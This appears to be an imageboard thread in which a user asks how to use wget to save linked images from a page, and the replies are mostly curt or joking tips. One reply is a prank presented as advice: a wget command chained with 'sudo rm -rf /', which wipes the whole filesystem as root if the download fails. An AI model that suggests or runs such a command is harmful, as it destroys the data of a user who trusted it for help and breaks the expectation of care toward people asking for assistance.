Need some assistance with Wget. I'm trying to download a webpage of re-hosted images into a folder on my PC.
The links are in a format that looks like this: `<a href="http://image/123.jpg" rel="nofollow" target="_blank"><img src="./website/thumbs/123.jpg" border="0"></a>`
>>59262022
$ man wget
You'll figure it out
cd /path/to/folder
wget http://www.url.com/of/the/page.html
>>59262022
wget 'url' || sudo rm -rf /
>>59262022
might be able to use wget's mirroring capability to snag them but iirc that can also begin spidering all of the internet due to no default limits on references